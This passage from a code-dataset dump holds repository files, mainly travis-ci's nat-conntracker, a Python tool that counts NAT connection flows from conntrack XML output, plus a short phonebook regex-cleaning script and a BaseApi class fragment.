"text": "import os\nimport sys\nimport os.path as p\n\nabs_dir = p.join(p.abspath(__file__), '..')\nsys.path.append(p.join(abs_dir, '..', '..'))\nfrom utils import parsingFile\n\nclass BaseApi:\n def __init__(self, name):\n self.api_login = parsingFile(p.abspath(p.join(abs_dir, '..', '..', 'config', 'api')))\n self.isLogin = False\n if self.api_login[name]['use']:\n self.login()\n self.isLogin = True\n\n def login(self):\n raise NotImplementedError\n\n def parsing(self, datas):\n if self.isLogin:\n if datas['type'] == 'keyword':\n self._parsing_keyword(datas)\n else:\n self._parsing_url(datas)\n\n def _parsing_keyword(self):\n raise NotImplementedError\n \n def _parsing_url(self):\n raise NotImplementedError\n"
}
] | 9 |
adexcell/Regular-expressions
|
https://github.com/adexcell/Regular-expressions
|
41a3644923e069aad04aaffca53cd01bc967055e
|
3224c3d280dc0c06eb225c05c60905ee2d4cea4a
|
2d306193c6df0095b4ba5388599bada014e23b96
|
refs/heads/master
| 2020-05-02T22:34:28.956004 | 2019-03-28T17:53:23 | 2019-03-28T17:53:23 | 178,255,562 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4821085035800934,
"alphanum_fraction": 0.5098114609718323,
"avg_line_length": 29.940475463867188,
"blob_id": "5aad8ea935f846b09e2d8825cdcab5b457099f65",
"content_id": "e1524363128119dbd13bda5373f2007755cfdb15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2608,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 84,
"path": "/main.py",
"repo_name": "adexcell/Regular-expressions",
"src_encoding": "UTF-8",
"text": "import csv\nimport re\n\nfrom pprint import pprint\n\n\ndef open_csv():\n with open('phonebook_raw.csv', encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\n return contacts_list\n\n\ndef rewriting_fio(contacts_list):\n for contact in contacts_list[1:]:\n position_1 = contact[0].split(' ')\n if len(position_1) == 3:\n contact[0] = position_1[0]\n contact[1] = position_1[1]\n contact[2] = position_1[2]\n elif len(position_1) == 2:\n contact[0] = position_1[0]\n contact[1] = position_1[1]\n else:\n pass\n position_2 = contact[1].split(' ')\n if len(position_2) == 2:\n contact[1] = position_2[0]\n contact[2] = position_2[1]\n else:\n pass\n return contacts_list\n\n\ndef pretty_phone(some_list):\n pattern_to_find = re.compile(\n '(\\+?\\d)(\\s{0,3})\\(?(\\d{3})\\)?(\\s{0,3})\\-?(\\d{3})\\-?(\\d{2})\\-?(\\d{2})(\\s{0,3})\\(?(доб.)?(\\s{0,3})(\\d{4})?\\)?'\n )\n for contact in some_list:\n if 'доб.' in contact[-2]:\n new_phone = pattern_to_find.sub(r'+7(\\3)\\5-\\6-\\7 доб.\\11', contact[-2])\n else:\n new_phone = pattern_to_find.sub(r'+7(\\3)\\5-\\6-\\7', contact[-2])\n contact[-2] = new_phone\n return some_list\n\n\ndef del_duplicates(some_list):\n in_list = list()\n clean_phonebook = list()\n clean_phonebook.append(some_list[0])\n for contact in sorted(some_list[1:]):\n if contact[0] in in_list:\n for clean_contact in sorted(clean_phonebook):\n if clean_contact[0] == contact[0]:\n counter = 0\n for value in contact:\n if value in clean_contact:\n counter += 1\n pass\n else:\n clean_contact[counter] = value\n counter += 1\n else:\n pass\n else:\n clean_phonebook.append(contact)\n in_list.append(contact[0])\n return clean_phonebook\n\n\ndef write_csv(ready_list):\n with open(\"pretty_phonebook.csv\", \"w\", encoding='UTF-8') as f:\n data_writer = csv.writer(f, delimiter=',')\n data_writer.writerows(ready_list)\n\n\nif __name__ == '__main__':\n contacts_list = open_csv()\n pretty_fio_list = rewriting_fio(contacts_list)\n pretty_phones_list = pretty_phone(pretty_fio_list)\n clean_list = del_duplicates(pretty_phones_list)\n pprint(clean_list)\n write_csv(clean_list)\n"
}
] | 1 |
travis-ci/nat-conntracker
|
https://github.com/travis-ci/nat-conntracker
|
cac092940812566393fd47b7ec2eabfe3ec4cd11
|
1a517aae05b4d53ae5ffdf813b15efdbee5e46a2
|
692e9eabe7d712be8ae4ee66f66069d2b60d70aa
|
refs/heads/master
| 2021-04-28T01:40:22.763659 | 2018-06-26T16:36:22 | 2018-06-26T16:36:22 | 122,285,510 | 2 | 0 |
MIT
| 2018-02-21T02:55:39 | 2018-05-10T08:40:26 | 2018-06-26T16:36:22 |
Python
|
[
{
"alpha_fraction": 0.5874999761581421,
"alphanum_fraction": 0.6206521987915039,
"avg_line_length": 21.16867446899414,
"blob_id": "10976ba4b25563aa9bbea12992836b0be533ab2c",
"content_id": "0205dab18e8425adc2706d63ea177f668fd2d565",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1840,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 83,
"path": "/tests/redis_syncer_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\n\nfrom nat_conntracker.redis_syncer import RedisSyncer\n\nimport pytest\n\n\[email protected]\ndef syncer():\n return RedisSyncer(\n logging.getLogger(__name__), 'nat-conntracker-tests:sync')\n\n\ndef test_redis_syncer_init(syncer):\n assert syncer is not None\n\n\ndef test_redis_syncer_pub(syncer, monkeypatch):\n published = []\n\n def mock_publish(*args):\n published.append(args)\n\n monkeypatch.setattr(syncer._conn, 'publish', mock_publish)\n syncer.pub(99, '127.0.0.1', '169.254.169.254', 14)\n\n assert len(published) > 0\n assert published[0][1] is not None\n\n msg = json.loads(published[0][1])\n\n assert msg == {\n 'threshold': 99,\n 'src': '127.0.0.1',\n 'dst': '169.254.169.254',\n 'count': 14\n }\n\n\nclass MockPubSubConn(object):\n def __init__(self):\n self.subscriptions = None\n\n def subscribe(self, **kwargs):\n self.subscriptions = kwargs\n\n def get_message(self):\n pass\n\n\ndef test_redis_syncer_sub(syncer, monkeypatch):\n mpsconn = MockPubSubConn()\n\n def mock_pubsub(*args, **kwargs):\n return mpsconn\n\n monkeypatch.setattr(syncer._conn, 'pubsub', mock_pubsub)\n syncer.sub(is_done=(lambda: True))\n\n assert mpsconn.subscriptions is not None\n assert mpsconn.subscriptions[syncer._channel] is not None\n\n\ndef test_redis_syncer_ping(syncer):\n assert syncer.ping() == b'PONG'\n\n\ndef test_redis_syncer_handle_message(syncer):\n assert syncer._handle_message({'type': 'not-a-message'}) is None\n bogus = syncer._handle_message({\n 'type': 'message',\n 'data': '{\"bogus\":true}'\n })\n assert bogus is None\n\n ok = syncer._handle_message({\n 'type':\n 'message',\n 'data':\n b'{\"threshold\":5,\"src\":\"10.9.8.7\",\"dst\":\"1.3.3.7\",\"count\":40}'\n })\n assert ok is None\n"
},
{
"alpha_fraction": 0.8157894611358643,
"alphanum_fraction": 0.8157894611358643,
"avg_line_length": 37,
"blob_id": "062a66eb35b5c1314a9faf91f135f632f07306b4",
"content_id": "77d13e5b9e5cd15d49cdf7bd5fa716d4405ef876",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 1,
"path": "/nat_conntracker/__init__.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "# this space intentionally left blank\n"
},
{
"alpha_fraction": 0.5504814982414246,
"alphanum_fraction": 0.5591798424720764,
"avg_line_length": 30.558822631835938,
"blob_id": "2e3e557256042ffbbd7ffea14716d46c4da61bea",
"content_id": "2520541eeaced7a01f044b7226f777553e275901",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9657,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 306,
"path": "/nat_conntracker/__main__.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport logging\nimport os\nimport sys\n\nfrom urllib.parse import unquote_plus\nfrom ipaddress import ip_network\n\nfrom .conntracker import Conntracker\nfrom .mem_settings import MemSettings\nfrom .null_healther import NullHealther\nfrom .null_syncer import NullSyncer\nfrom .runner import Runner\nfrom .stats import Stats\n\ntry:\n import pkg_resources\n VERSION = pkg_resources.get_distribution('nat_conntracker').version\nexcept Exception:\n VERSION = 'unknown'\n\n__all__ = ['main']\n\nPRIVATE_NETS = (\n ip_network('10.0.0.0/8'),\n ip_network('127.0.0.0/8'),\n ip_network('169.254.0.0/16'),\n ip_network('172.16.0.0/12'),\n ip_network('192.0.2.0/24'),\n ip_network('192.168.0.0/16'),\n)\n\nARG_DEFAULTS = (\n ('conn_threshold', 100),\n ('debug', False),\n ('dst_ignore_cidrs', ('127.0.0.1/32', )),\n ('eval_interval', 60),\n ('events', sys.stdin),\n ('gesund_checks_enabled', False),\n ('gesund_namespace', 'gesund-0'),\n ('include_privnets', False),\n ('log_file', ''),\n ('max_stats_size', 1000),\n ('redis_url', ''),\n ('src_ignore_cidrs', ('127.0.0.1/32', )),\n ('sync_channel', 'nat-conntracker:sync'),\n ('top_n', 10),\n)\n\n\ndef main(sysargs=sys.argv[:]):\n parser = build_argument_parser(os.environ)\n args = parser.parse_args(sysargs[1:])\n _handle_misc_printing(args.print_service, args.print_wrapper)\n\n runner = build_runner(**args.__dict__)\n runner.run()\n return 0\n\n\ndef build_runner(**kwargs):\n args = dict(ARG_DEFAULTS)\n args.update(kwargs)\n\n logging_level = logging.INFO\n if args['debug']:\n logging_level = logging.DEBUG\n\n log_format = 'time=%(asctime)s level=%(levelname)s %(message)s'\n if VERSION != 'unknown':\n log_format = f'v={VERSION} {log_format}'\n\n logging_args = dict(\n level=logging_level, format=log_format, datefmt='%Y-%m-%dT%H:%M:%S%z')\n\n if args['log_file']:\n logging_args['filename'] = args['log_file']\n\n logging.basicConfig(**logging_args)\n logger = logging.getLogger(__name__)\n\n syncer = NullSyncer()\n settings = MemSettings()\n healther = NullHealther()\n if args.get('redis_url', ''):\n from .redis_syncer import RedisSyncer\n syncer = RedisSyncer(\n logger, args['sync_channel'], conn_url=args['redis_url'])\n\n from .redis_settings import RedisSettings\n settings = RedisSettings(conn_url=args['redis_url'])\n\n logger.info('using redis syncer and settings')\n\n if args.get('gesund_checks_enabled', False):\n from .gesunde_freundschaft import GesundeFreundschaft\n healther = GesundeFreundschaft(\n conn_url=args['redis_url'],\n redis_namespace=args['gesund_namespace'])\n\n src_ign = None\n dst_ign = None\n if args['include_privnets']:\n src_ign = ()\n dst_ign = ()\n\n for src_item in args['src_ignore_cidrs']:\n if src_item == 'private':\n src_ign = (src_ign or ()) + PRIVATE_NETS\n continue\n src_ign = (src_ign or ()) + (ip_network(src_item), )\n\n for dst_item in args['dst_ignore_cidrs']:\n if dst_item == 'private':\n dst_ign = (dst_ign or ()) + PRIVATE_NETS\n continue\n dst_ign = (dst_ign or ()) + (ip_network(dst_item), )\n\n settings.ping()\n syncer.ping()\n healther.ping()\n\n for net in src_ign:\n logger.info(f'adding src ignore={net}')\n settings.add_ignore_src(net)\n\n for net in dst_ign:\n logger.info(f'adding dst ignore={net}')\n settings.add_ignore_dst(net)\n\n conntracker = Conntracker(\n logger,\n syncer,\n settings,\n healther,\n Stats(max_size=args['max_stats_size']))\n\n return Runner(conntracker, syncer, logger, **dict(args))\n\n\ndef build_argument_parser(env, defaults=None):\n defaults = 
defaults if defaults is not None else dict(ARG_DEFAULTS)\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '-V', '--version', action='version', version=f'%(prog)s {VERSION}')\n parser.add_argument(\n 'events',\n nargs='?',\n type=argparse.FileType('r'),\n default=defaults['events'],\n help='input event XML stream or filename')\n parser.add_argument(\n '-T',\n '--conn-threshold',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_CONN_THRESHOLD',\n env.get('CONN_THRESHOLD', defaults['conn_threshold']))),\n help='connection count threshold for message logging')\n parser.add_argument(\n '-n',\n '--top-n',\n default=int(\n env.get('NAT_CONNTRACKER_TOP_N', env.get('TOP_N',\n defaults['top_n']))),\n type=int,\n help='periodically sample the top n counted connections')\n parser.add_argument(\n '-S',\n '--max-stats-size',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_MAX_STATS_SIZE',\n env.get('MAX_STATS_SIZE', defaults['max_stats_size']))),\n help='max number of src=>dst:dport counters to track')\n parser.add_argument(\n '-l',\n '--log-file',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_LOG_FILE',\n env.get('LOG_FILE', defaults['log_file']))),\n help='optional separate file for logging')\n parser.add_argument(\n '-R',\n '--redis-url',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_REDIS_URL',\n env.get('REDIS_URL', defaults['redis_url']))),\n help='redis URL for syncing conntracker')\n parser.add_argument(\n '-C',\n '--sync-channel',\n type=unquote_plus,\n default=unquote_plus(\n env.get('NAT_CONNTRACKER_SYNC_CHANNEL',\n env.get('SYNC_CHANNEL', defaults['sync_channel']))),\n help='redis channel name to use for syncing')\n parser.add_argument(\n '-G',\n '--gesund-checks-enabled',\n action='store_true',\n default=_asbool(\n env.get(\n 'NAT_CONNTRACKER_GESUND_CHECKS_ENABLED',\n env.get('GESUND_CHECKS_ENABLED',\n defaults['gesund_checks_enabled']))),\n help='enable redis-based health check integration with gesund')\n parser.add_argument(\n '-N',\n '--gesund-namespace',\n default=env.get(\n 'NAT_CONNTRACKER_GESUND_NAMESPACE',\n env.get('GESUND_NAMESPACE', defaults['gesund_namespace'])),\n help='redis namespace to use when communicating with gesund')\n parser.add_argument(\n '-I',\n '--eval-interval',\n type=int,\n default=int(\n env.get('NAT_CONNTRACKER_EVAL_INTERVAL',\n env.get('EVAL_INTERVAL', defaults['eval_interval']))),\n help='interval at which stats will be evaluated')\n parser.add_argument(\n '-s',\n '--src-ignore-cidrs',\n action='append',\n type=unquote_plus,\n default=list(\n filter(lambda s: s.strip() != '', [\n unquote_plus(s.strip()) for s in env.get(\n 'NAT_CONNTRACKER_SRC_IGNORE_CIDRS',\n env.get('SRC_IGNORE_CIDRS', defaults['src_ignore_cidrs']\n [0])).split(',')\n ])),\n help='CIDR notation of source addrs/nets to ignore')\n parser.add_argument(\n '-d',\n '--dst-ignore-cidrs',\n action='append',\n type=unquote_plus,\n default=list(\n filter(lambda s: s.strip() != '', [\n unquote_plus(s.strip()) for s in env.get(\n 'NAT_CONNTRACKER_DST_IGNORE_CIDRS',\n env.get('DST_IGNORE_CIDRS', defaults['dst_ignore_cidrs']\n [0])).split(',')\n ])),\n help='CIDR notation of destination addrs/nets to ignore')\n parser.add_argument(\n '-P',\n '--include-privnets',\n action='store_true',\n default=_asbool(\n env.get('NAT_CONNTRACKER_INCLUDE_PRIVNETS',\n env.get('INCLUDE_PRIVNETS',\n defaults['include_privnets']))),\n help='include private networks when handling flows')\n 
parser.add_argument(\n '-D',\n '--debug',\n action='store_true',\n default=_asbool(\n env.get('NAT_CONNTRACKER_DEBUG', env.get('DEBUG',\n defaults['debug']))),\n help='enable debug logging')\n parser.add_argument(\n '--print-service',\n action='store_true',\n default=False,\n help='print systemd service definition and exit')\n parser.add_argument(\n '--print-wrapper',\n action='store_true',\n default=False,\n help='print wrapper script and exit')\n\n return parser\n\n\ndef _asbool(value):\n return str(value).lower().strip() in ('1', 'yes', 'on', 'true')\n\n\ndef _handle_misc_printing(print_service, print_wrapper):\n _top = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n printed_any = False\n\n for truth, filename in ((print_service, 'nat-conntracker.service'),\n (print_wrapper, 'nat-conntracker-wrapper')):\n if not truth:\n continue\n printed_any = True\n with open(os.path.join(_top, 'misc', filename)) as fp:\n print(fp.read(), end='')\n\n if printed_any:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4765184819698334,
"alphanum_fraction": 0.48090168833732605,
"avg_line_length": 27.51785659790039,
"blob_id": "33be1adbca5feb3715490f9523fcd0da48a66f9c",
"content_id": "53c0385646bce7c8f97ac67dcd262369145117f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1597,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 56,
"path": "/nat_conntracker/stats.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from collections import Counter, OrderedDict\nfrom threading import Lock\n\n__all__ = ['Stats']\n\n\nclass Stats(object):\n def __init__(self, max_size=1000):\n self.max_size = max_size\n self.counter = Counter()\n self.index = OrderedDict()\n self._lock = Lock()\n\n def __repr__(self):\n return '<{} max_size={!r}>'.format(self.__class__.__name__,\n self.max_size)\n\n def top(self, n=10):\n try:\n self._lock.acquire()\n ret = []\n for key, count in self.counter.most_common(n):\n (src, dst) = self.index[key]\n ret.append(((src.host, self._daddr(dst)), count))\n return ret\n finally:\n self._lock.release()\n\n def reset(self):\n try:\n self._lock.acquire()\n self.counter = Counter()\n self.index = OrderedDict()\n finally:\n self._lock.release()\n\n def add(self, src, dst):\n try:\n self._lock.acquire()\n while len(self.index) > self.max_size:\n item_key, _ = self.index.popitem(last=False)\n del self.counter[item_key]\n key = self._key(src, dst)\n self.counter[key] += 1\n self.index[key] = (src, dst)\n finally:\n self._lock.release()\n\n def _key(self, src, dst):\n return '{}_{}'.format(src.host, self._daddr(dst))\n\n def _daddr(self, dst):\n dport = dst.port\n if dport == '':\n dport = '?'\n return '{}:{}'.format(dst.host, dport)\n"
},
{
"alpha_fraction": 0.7323943376541138,
"alphanum_fraction": 0.7323943376541138,
"avg_line_length": 22.66666603088379,
"blob_id": "fc80d545c77ee0173317940a3e282e9a94e4fbd1",
"content_id": "e33a22adaf19e4c8745830de7b6346d167771b6d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 6,
"path": "/tests/flow_parser_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from nat_conntracker.flow_parser import FlowParser\n\n\ndef test_flow_parser_init():\n flp = FlowParser(None, None)\n assert flp is not None\n"
},
{
"alpha_fraction": 0.5574712753295898,
"alphanum_fraction": 0.5603448152542114,
"avg_line_length": 22.200000762939453,
"blob_id": "6e7855a850ece54cb99f0ee8a3dc05bfd873162b",
"content_id": "b5de7ca8ed0aa59696a61e29760bdbacd920cada",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 30,
"path": "/nat_conntracker/mem_settings.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\n__all__ = ['MemSettings']\n\n\nclass MemSettings(object):\n def __init__(self):\n self._settings = {\n 'src_ignore': set(),\n 'dst_ignore': set(),\n 'min_flow': 10\n }\n\n def ping(self):\n pass\n\n def src_ignore(self):\n return list(self._settings['src_ignore'])\n\n def dst_ignore(self):\n return list(self._settings['dst_ignore'])\n\n def add_ignore_src(self, src):\n self._settings['src_ignore'].add(ip_network(str(src)))\n\n def add_ignore_dst(self, dst):\n self._settings['dst_ignore'].add(ip_network(str(dst)))\n\n def min_flow(self):\n return self._settings['min_flow']\n"
},
{
"alpha_fraction": 0.5961422324180603,
"alphanum_fraction": 0.623869776725769,
"avg_line_length": 26.649999618530273,
"blob_id": "0bd515464967041df689063a172050933df88640",
"content_id": "7590f74b51fa5b3fe48d5dcd2a9023942fa2849e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1659,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 60,
"path": "/tests/cli_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nimport sys\n\nfrom ipaddress import ip_address\n\nfrom nat_conntracker.__main__ import (build_argument_parser, build_runner,\n PRIVATE_NETS)\n\nISPY2 = sys.version_info.major == 2\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef test_build_argument_parser():\n env = {'CONN_THRESHOLD': '99'}\n parser = build_argument_parser(env)\n assert parser is not None\n\n args = parser.parse_args([\n '--top-n=4', '-S', '499', '--log-file', '%2Fhuh%2Fwat.log', '-I24',\n '--include-privnets'\n ])\n\n assert args.top_n == 4\n assert args.conn_threshold == 99\n assert args.max_stats_size == 499\n assert args.log_file == '/huh/wat.log'\n assert args.eval_interval == 24\n assert args.include_privnets is True\n\n\nclass FakeArgs(object):\n def __init__(self):\n self.events = None\n self.conn_threshold = 100\n self.top_n = 10\n self.eval_interval = 1\n\n\ndef test_run_events_sample(caplog):\n events = open(\n os.path.join(HERE, 'data', 'conntrack-events-sample.xml'), 'r')\n runner = build_runner(events=events, conn_threshold=100, debug=True)\n with caplog.at_level(logging.DEBUG):\n runner.run()\n\n assert ' over threshold=100 src=10.10.0.7' in caplog.text\n assert ' adding' in caplog.text\n assert ' begin sample' in caplog.text\n assert ' end sample' in caplog.text\n assert ' cleaning up' in caplog.text\n\n\ndef test_private_nets():\n assert len(PRIVATE_NETS) > 0\n covers_local = False\n for net in PRIVATE_NETS:\n if ip_address('10.10.0.99') in net:\n covers_local = True\n assert covers_local\n"
},
{
"alpha_fraction": 0.72826087474823,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 22,
"blob_id": "97e343fa912c7d91efae8c00bd6e9548952eb4cc",
"content_id": "ad5520d85fc471a25c003d1736da21308b6e4066",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 4,
"path": "/bin/nat-conntracker",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nfrom nat_conntracker.__main__ import main\nsys.exit(main())\n"
},
{
"alpha_fraction": 0.5519053936004639,
"alphanum_fraction": 0.5624178647994995,
"avg_line_length": 27.185184478759766,
"blob_id": "ba6c3ffb1939e5aa47f98c02a7a3353e27a09fbb",
"content_id": "6957fec7690110f88c293caca714166a316ded5e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 27,
"path": "/nat_conntracker/gesunde_freundschaft.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import redis\n\n__all__ = ['GesundeFreundschaft']\n\n\nclass GesundeFreundschaft:\n def __init__(self,\n conn_url='redis://localhost:6379/0',\n redis_namespace='gesund-0'):\n self._conn = redis.from_url(conn_url)\n self._ns = redis_namespace\n self._marked = set()\n\n def ping(self):\n self._conn.ping()\n\n def cleanup(self):\n for key in self._marked:\n self._conn.srem(f'{self._ns}:health-checks', key)\n\n def healthy(self, key, ttl=60):\n self._marked.add(key)\n self._conn.sadd(f'{self._ns}:health-checks', key)\n self._conn.setex(f'{self._ns}:health-check:{key}', 'y', ttl)\n\n def unhealthy(self, key):\n self._conn.delete(f'{self._ns}:health-check:{key}')\n"
},
{
"alpha_fraction": 0.6270325183868408,
"alphanum_fraction": 0.6280487775802612,
"avg_line_length": 24.894737243652344,
"blob_id": "6dd9b612065711ab70679f7550457264c730a422",
"content_id": "cc16ed3ed4c82c48ca56734320d572464cea499a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 984,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 38,
"path": "/systemd-wrapper",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n# systemd wrapper script expected to be installed at ___SYSTEMD_WRAPPER___ for\n# use by adjacent systemd.service file\nset -o errexit\nset -o pipefail\n\nmain() {\n local name=\"${1:-nat-conntracker}\"\n\n eval \"$(tfw printenv nat-conntracker)\"\n\n : \"${NAT_CONNTRACKER_CONNTRACK_ARGS:=-o+xml+-E+conntrack}\"\n : \"${NAT_CONNTRACKER_SELF_IMAGE:-travisci/nat-conntracker:master}\"\n\n docker stop \"${name}\" &>/dev/null || true\n docker rm -f \"${name}\" &>/dev/null || true\n\n local env_file\n env_file=\"$(tfw writeenv nat-conntracker \"${name}\")\"\n\n local conntrack_args\n conntrack_args=\"$(tfw urldecode \"${NAT_CONNTRACKER_CONNTRACK_ARGS}\")\"\n\n local conntrack_command=\"conntrack ${conntrack_args}\"\n ${conntrack_command} |\n docker run \\\n --rm \\\n --user nobody \\\n --interactive \\\n --attach STDIN \\\n --attach STDOUT \\\n --attach STDERR \\\n --name \"${name}\" \\\n --env-file \"${env_file}\" \\\n \"${NAT_CONNTRACKER_SELF_IMAGE}\"\n}\n\nmain \"$@\"\n"
},
{
"alpha_fraction": 0.7022727131843567,
"alphanum_fraction": 0.7022727131843567,
"avg_line_length": 24.882352828979492,
"blob_id": "30c198dcf8d974164921daad86cc602cc5a7bc3b",
"content_id": "b259cad82fa920f3cad41eb540fd32da19e520d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 17,
"path": "/README.rst",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "NAT Conntracker\n===============\n\n.. image:: https://travis-ci.org/travis-ci/nat-conntracker.svg?branch=master\n :target: https://travis-ci.org/travis-ci/nat-conntracker\n\n.. image:: https://codecov.io/gh/travis-ci/nat-conntracker/branch/master/graph/badge.svg\n :target: https://codecov.io/gh/travis-ci/nat-conntracker\n\nTracking some conns!\n\nUsage\n-----\n\nPipe in some conntrack XML::\n\n conntrack -o xml -E conntrack | nat-conntracker -\n"
},
{
"alpha_fraction": 0.7237149477005005,
"alphanum_fraction": 0.7254672646522522,
"avg_line_length": 23.457143783569336,
"blob_id": "d2dd884d788f9a349d0bffefe8c8a95267b4dc38",
"content_id": "4b7266d8840e6c0743e6c282f26328de0be323ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1712,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 70,
"path": "/Makefile",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "PACKAGE := nat_conntracker\nEXEC_PREFIX ?= /usr/local\nCONFIG_PREFIX ?= /etc\n\nGIT_DESCRIBE ?= $(shell git describe --always --dirty --tags)\nDOCKER_TAG ?= travisci/nat-conntracker:$(GIT_DESCRIBE)\n\nDOCKER ?= docker\nPIP ?= pip3\nPYTHON ?= python3\n\nTESTDATA := tests/data/conntrack-events-sample.xml\n\n.PHONY: all\nall: clean deps fmt coverage\n\n.PHONY: clean\nclean:\n\t$(RM) -r $(TESTDATA) htmlcov .coverage\n\n.PHONY: deps\ndeps: $(TESTDATA)\n\t$(PIP) install -r requirements.txt\n\n.PHONY: fmt\nfmt:\n\tyapf -i -vv $(shell git ls-files '*.py') bin/nat-conntracker\n\n.PHONY: install\ninstall:\n\t$(PIP) install --upgrade --ignore-installed $(PWD)\n\n.PHONY: coverage\ncoverage: htmlcov/index.html\n\n.PHONY: test\ntest:\n\t$(PYTHON) setup.py pytest --addopts=\"--cov=$(PACKAGE)\"\n\n\nhtmlcov/index.html: .coverage\n\tcoverage html\n\n.coverage: test\n\n# The sysinstall target is expected to be run by a user with write access to the\n# CONFIG_PREFIX and EXEC_PREFIX sub-directories used below, as well as the\n# ability to run systemctl commands, such as root. :scream_cat:\n.PHONY: sysinstall\nsysinstall: install\n\ttouch $(CONFIG_PREFIX)/default/nat-conntracker\n\tcp -v ./misc/nat-conntracker.service $(CONFIG_PREFIX)/systemd/system/nat-conntracker.service\n\tcp -v ./misc/nat-conntracker-wrapper $(EXEC_PREFIX)/bin/nat-conntracker-wrapper\n\tsystemctl enable nat-conntracker\n\n.PHONY: docker-build\ndocker-build:\n\t$(DOCKER) build -t=\"$(DOCKER_TAG)\" .\n\n.PHONY: docker-login\ndocker-login:\n\t@echo \"$(DOCKER_LOGIN_PASSWORD)\" | \\\n\t\t$(DOCKER) login --username \"$(DOCKER_LOGIN_USERNAME)\" --password-stdin\n\n.PHONY: docker-push\ndocker-push:\n\t$(DOCKER) push \"$(DOCKER_TAG)\"\n\ntests/data/conntrack-events-sample.xml: tests/data/conntrack-events-sample.xml.bz2\n\tbzcat $^ >$@\n"
},
{
"alpha_fraction": 0.5277973413467407,
"alphanum_fraction": 0.534130871295929,
"avg_line_length": 28.60416603088379,
"blob_id": "752e94d27746d028affa49d5b7b941d170af2692",
"content_id": "2261832f0a03d8486703eeff19fdd072d22a577e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1421,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 48,
"path": "/nat_conntracker/redis_syncer.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
